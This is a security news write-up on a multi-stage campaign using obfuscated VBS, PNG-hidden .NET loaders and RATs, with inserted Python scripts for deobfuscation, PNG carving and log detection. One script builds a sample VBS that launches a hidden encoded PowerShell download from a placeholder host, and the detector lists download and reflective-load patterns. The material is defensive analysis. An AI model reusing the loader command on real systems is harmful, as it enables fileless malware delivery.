CyberSecurityNews

Open Directory Malware Campaign Uses Obfuscated VBS, PNG Loaders and RAT Payloads


A sophisticated multi-stage malware campaign has surfaced, deploying obfuscated Visual Basic Script (VBS) files, PNG-embedded loaders, and remote access trojans (RATs) to target systems without leaving a trace on disk.

What began as a routine endpoint detection in early 2026 quickly revealed itself to be far more organized than a single opportunistic attack, exposing a reusable delivery framework capable of pushing different malware payloads across separate attack chains from one shared infrastructure.

The first sign of the campaign was a suspicious VBS file named Name_File.vbs, found in the Users\Public\Downloads directory of a compromised endpoint.

SentinelOne endpoint protection caught and quarantined the file before it could fully run. Even so, the encoded content inside the script warranted a closer look.

When decoded, it exposed a Base64-encoded PowerShell command with embedded external network references — a clear signal that the file was designed to pull additional components from a remote server.

LevelBlue analysts identified that this single endpoint alert was a window into a much larger operation.


The investigation, carried out by LevelBlue’s SpiderLabs Cyber Threat Intelligence team, uncovered an attacker-controlled domain hosting multiple obfuscated VBS files, each linked to a different malware payload — including XWorm variants and Remcos RAT stored as text files.

A separate infection chain tied to a fake PDF was also active on the same infrastructure, confirming the campaign’s deliberate, multi-vector design.

The attacker’s infrastructure centered on openly accessible directories within the domain news4me[.]xyz, including /coupon/, /protector/, and /invoice/.

Each directory served a distinct role — staging VBS launchers, hosting obfuscated payload files, or delivering entirely separate infection vectors.

This open-directory setup was not accidental; it let the attacker quickly update, rotate, or expand hosted payloads without modifying the core delivery logic, creating a flexible, scalable system capable of staying operational even after partial detection.

Inside the Infection Mechanism: VBS to In-Memory RAT Execution

The infection begins with a VBS file that acts purely as a launcher, carrying no active malicious code of its own.

Name_File.vbs content (Source - LevelBlue)

The script is buried beneath layers of Unicode obfuscation. Stripping those characters exposes the raw encoded script in a Base64-encoded PowerShell command that serves as the true engine of the attack.

Name_File.vbs Unicode removal (Source - LevelBlue)

That PowerShell command functions as a fileless loader. It enforces TLS 1.2 and uses the Net.WebClient class to fetch a remote file from an Internet Archive URL.

Name_File.vbs decoded PowerShell command (Source - LevelBlue)
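To show how an analyst peels back the layers just described, here is an added Python triage script (my own example, not LevelBlue's tooling and not the real sample). It builds a constructed stand-in for Name_File.vbs, strips the interleaved Unicode filler, locates the Base64 run, decodes it as UTF-16LE (the encoding PowerShell's -EncodedCommand expects, falling back to UTF-8) and checks the decoded command for the loader indicators the write-up names. The filler code points, the VBS launcher text and the placeholder URL are assumptions made for the example.

```python
import base64
import re
from typing import List, Optional

# Constructed stand-in for Name_File.vbs (not the real sample): a PowerShell
# one-liner encoded the way -EncodedCommand expects (UTF-16LE, then Base64),
# wrapped in a VBS launcher, with invisible Unicode filler interleaved after
# every character in the style of obfuscation the write-up describes.
PS_COMMAND = (
    "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; "
    "$b = (New-Object Net.WebClient).DownloadData('https://example.invalid/MSI_PRO_with_b64.png')"
)
_ENCODED = base64.b64encode(PS_COMMAND.encode("utf-16-le")).decode("ascii")
_NOISE = "\u200b\u200c\u200d\u2060\ufeff"  # zero-width space/joiners, word joiner, BOM (assumed filler)


def obfuscate_with_unicode(text: str) -> str:
    """Interleave invisible code points after every character (constructed noise)."""
    return "".join(ch + _NOISE[i % len(_NOISE)] for i, ch in enumerate(text))


SAMPLE_VBS = obfuscate_with_unicode(
    'Set sh = CreateObject("WScript.Shell")\n'
    f'sh.Run "powershell -nop -w hidden -EncodedCommand {_ENCODED}", 0, False\n'
)

BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
LOADER_INDICATORS = ("Tls12", "Net.WebClient", "DownloadData", "DownloadString",
                     "Reflection.Assembly", "FromBase64String")


def strip_unicode_noise(text: str) -> str:
    """Drop every non-ASCII code point; VBS keywords and Base64 are pure ASCII."""
    return "".join(ch for ch in text if ord(ch) < 128)


def _looks_like_script(text: str) -> bool:
    """Accept a decoding only if it is essentially ASCII with no embedded NULs."""
    if not text or "\x00" in text:
        return False
    return sum(ord(ch) < 128 for ch in text) / len(text) > 0.9


def decode_powershell_blob(blob: str) -> Optional[str]:
    """Decode a Base64 run, trying UTF-16LE (EncodedCommand) before UTF-8."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        return None
    for encoding in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        if _looks_like_script(text):
            return text
    return None


def extract_encoded_commands(vbs_text: str) -> List[str]:
    """De-obfuscate the script and return every decodable Base64 command inside it."""
    cleaned = strip_unicode_noise(vbs_text)
    commands = []
    for match in BASE64_RUN.finditer(cleaned):
        decoded = decode_powershell_blob(match.group(0))
        if decoded is not None:
            commands.append(decoded)
    return commands


def triage(vbs_text: str) -> dict:
    """Summarise decoded commands and which fileless-loader indicators they contain."""
    commands = extract_encoded_commands(vbs_text)
    indicators = sorted({ind for cmd in commands for ind in LOADER_INDICATORS if ind in cmd})
    return {"decoded_commands": commands, "indicators": indicators}


if __name__ == "__main__":
    result = triage(SAMPLE_VBS)
    for cmd in result["decoded_commands"]:
        print("decoded:", cmd)
    print("indicators:", result["indicators"])
```

The UTF-16LE attempt comes first because that is what -EncodedCommand produces; the ASCII-ratio check rejects the CJK-looking garbage you get when a UTF-8 blob is misread as UTF-16, so the fallback order is safe for either encoding.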

Instead of pulling a traditional executable, it downloads a PNG image, MSI_PRO_with_b64.png. The file looks ordinary, but hidden inside it, between custom BaseStart and BaseEnd markers, is an embedded .NET assembly.

This assembly, known as PhantomVAI, loads directly into memory via Reflection.Assembly::Load, running entirely in RAM and bypassing most file-based security controls.

Once running, PhantomVAI passes two URLs into its VAI method for follow-on execution. The first, news4me[.]xyz/protector/johnremcos.txt, contains an obfuscated string that decodes into a working instance of Remcos RAT, giving the attacker persistent remote access to the machine.

The second URL delivers uac.png, a PNG file carrying a UAC Bypass DLL in the same embedded format — designed to silently escalate privileges. Together, these payloads hand the attacker full control while leaving virtually no traditional file artifacts behind.
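For the PNG-carrier stage used by both MSI_PRO_with_b64.png and uac.png, the following added Python example (my own code, not from LevelBlue or the campaign) parses the PNG chunk structure, reports any bytes trailing the IEND chunk, carves whatever sits between the BaseStart and BaseEnd markers, and tests whether the decoded blob starts with an MZ header. It constructs its own minimal PNG with a fake marked blob; the exact byte form of the markers and their placement after IEND are assumptions, since the write-up only names them.

```python
import base64
import struct
import zlib
from typing import Iterator, Optional, Tuple

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
MARK_START = b"BaseStart"  # marker names from the write-up; exact byte form is assumed
MARK_END = b"BaseEnd"

# Constructed stand-in for the embedded assembly: an MZ header followed by
# filler. It is not a real executable.
FAKE_PE = b"MZ" + b"\x00" * 62 + b"NOT-A-REAL-ASSEMBLY"


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: big-endian length, type, data, CRC32(type+data)."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_sample_png(payload: bytes) -> bytes:
    """Constructed sample: a valid 1x1 greyscale PNG with a marked Base64 blob appended."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # 1x1, 8-bit grey, no interlace
    idat = zlib.compress(b"\x00\x00")  # filter byte 0 + one black pixel
    image = PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")
    return image + MARK_START + base64.b64encode(payload) + MARK_END


def png_chunks(data: bytes) -> Iterator[Tuple[bytes, int]]:
    """Yield (chunk type, offset just past the chunk) up to and including IEND."""
    if data[:8] != PNG_SIGNATURE:
        raise ValueError("not a PNG file")
    pos = 8
    while pos + 8 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        end = pos + 12 + length  # length field + type + data + CRC
        if end > len(data):
            raise ValueError("truncated chunk")
        yield ctype, end
        if ctype == b"IEND":
            return
        pos = end


def carve_marked_blob(data: bytes) -> Optional[bytes]:
    """Return the Base64-decoded bytes between the markers, or None if absent or invalid."""
    start = data.find(MARK_START)
    if start == -1:
        return None
    end = data.find(MARK_END, start + len(MARK_START))
    if end == -1:
        return None
    try:
        return base64.b64decode(data[start + len(MARK_START):end], validate=True)
    except ValueError:
        return None


def analyze_png(data: bytes) -> dict:
    """Report trailing bytes after IEND and any marker-delimited embedded payload."""
    iend_end = None
    for ctype, end in png_chunks(data):
        if ctype == b"IEND":
            iend_end = end
    report = {"iend_found": iend_end is not None, "trailing_bytes": 0,
              "embedded": None, "is_pe": False}
    if iend_end is None:
        return report
    report["trailing_bytes"] = len(data) - iend_end
    blob = carve_marked_blob(data)
    if blob is not None:
        report["embedded"] = blob
        report["is_pe"] = blob[:2] == b"MZ"
    return report


if __name__ == "__main__":
    sample = build_sample_png(FAKE_PE)
    result = analyze_png(sample)
    print("trailing bytes after IEND:", result["trailing_bytes"])
    print("embedded payload looks like a PE:", result["is_pe"])
```

Image decoders stop at IEND and ignore whatever follows, which is why a carrier like this renders normally; a non-zero trailing byte count on a downloaded PNG is therefore a cheap first-pass signal even before the marker search runs.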

Organizations should restrict .vbs and .bat execution from user-writable directories such as Users\Public and enforce constrained PowerShell policies with in-memory execution logging.

At the network level, blocking WebDAV-based connections and filtering .xyz top-level domains can limit access to the attacker infrastructure identified in this campaign.
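As a worked illustration of the logging and filtering recommendations above, here is an added Python detector (my own example, not from the report) run over constructed telemetry lines in a flat key=value form. It flags a script host launching a .vbs from Users\Public, a PowerShell child of that script host with an encoded command, a script block combining a download primitive with a reflective assembly load, and DNS lookups of a filtered TLD. The log format, field names and rule thresholds are assumptions; the domain is the one named in the article.

```python
import re
from typing import Dict, List

# Constructed telemetry lines (not real logs) in a flat "Type|key=value|..."
# form standing in for process-creation, PowerShell script-block and DNS events.
# The .xyz domain is the attacker infrastructure named in the write-up.
LOG_LINES = [
    "ProcessCreate|Image=C:\\Windows\\System32\\wscript.exe"
    "|CommandLine=wscript.exe C:\\Users\\Public\\Downloads\\Name_File.vbs",
    "ProcessCreate|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|ParentImage=C:\\Windows\\System32\\wscript.exe"
    "|CommandLine=powershell -nop -w hidden -EncodedCommand QQBBAEEAQQA=",
    "ScriptBlock|Text=[Net.ServicePointManager]::SecurityProtocol = "
    "[Net.SecurityProtocolType]::Tls12; $b = (New-Object Net.WebClient)"
    ".DownloadData($u); [Reflection.Assembly]::Load($asm)",
    "DnsQuery|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|QueryName=news4me.xyz",
    "ProcessCreate|Image=C:\\Windows\\System32\\notepad.exe"
    "|CommandLine=notepad.exe C:\\Users\\alice\\notes.txt",
    "ScriptBlock|Text=Get-ChildItem C:\\Temp -Recurse",
    "DnsQuery|Image=C:\\Windows\\System32\\svchost.exe|QueryName=update.microsoft.com",
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
BLOCKED_TLDS = (".xyz",)  # TLD filter from the recommendations; extend per environment
PUBLIC_SCRIPT = re.compile(r"\\users\\public\\[^\s\"']*\.(vbs|bat)\b")
ENCODED_FLAG = re.compile(r"(^|\s)-e(n[a-z]*)?(\s|$)")  # -e, -en, -enc ... -encodedcommand
DOWNLOAD_PRIMITIVES = ("net.webclient", "downloaddata", "downloadstring", "invoke-webrequest")
REFLECTIVE_LOAD = ("reflection.assembly", "::load(", "frombase64string")


def parse(line: str) -> Dict[str, str]:
    """Split 'Type|key=value|...' into a dict; only the first '=' of each field is the separator."""
    head, *fields = line.split("|")
    event = {"type": head}
    for field in fields:
        key, _, value = field.partition("=")
        event[key] = value
    return event


def detect(lines: List[str]) -> List[Dict[str, object]]:
    """Apply the four rules to each line and return (line index, rule name) alerts in order."""
    alerts = []
    for idx, line in enumerate(lines):
        ev = parse(line)
        image = ev.get("Image", "").lower()
        parent = ev.get("ParentImage", "").lower()
        cmd = ev.get("CommandLine", "").lower()
        text = ev.get("Text", "").lower()
        query = ev.get("QueryName", "").lower()
        if ev["type"] == "ProcessCreate":
            # Rule 1: a script host running a .vbs/.bat out of a user-writable public directory.
            if image.endswith(SCRIPT_HOSTS) and PUBLIC_SCRIPT.search(cmd):
                alerts.append({"line": idx, "rule": "vbs_from_public_dir"})
            # Rule 2: PowerShell spawned by a script host with an encoded command.
            if parent.endswith(SCRIPT_HOSTS) and image.endswith("powershell.exe") and ENCODED_FLAG.search(cmd):
                alerts.append({"line": idx, "rule": "encoded_powershell_from_script_host"})
        elif ev["type"] == "ScriptBlock":
            # Rule 3: script-block logging shows a download primitive plus a reflective load.
            if any(p in text for p in DOWNLOAD_PRIMITIVES) and any(r in text for r in REFLECTIVE_LOAD):
                alerts.append({"line": idx, "rule": "fileless_loader"})
        elif ev["type"] == "DnsQuery":
            # Rule 4: lookup of a TLD the organisation has chosen to filter.
            if query.endswith(BLOCKED_TLDS):
                alerts.append({"line": idx, "rule": "blocked_tld_lookup"})
    return alerts


if __name__ == "__main__":
    for alert in detect(LOG_LINES):
        print(f"line {alert['line']}: {alert['rule']}")
```

Rule 3 is the one that depends on the in-memory execution logging the article calls for: without PowerShell script-block logging the decoded command never reaches the SIEM, and the only visible artifacts are the script-host process tree and the DNS query.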

Endpoint protection must be paired with deeper threat intelligence investigation — stopping one alert is not sufficient when the broader infrastructure remains active and ready to deploy from alternate vectors.
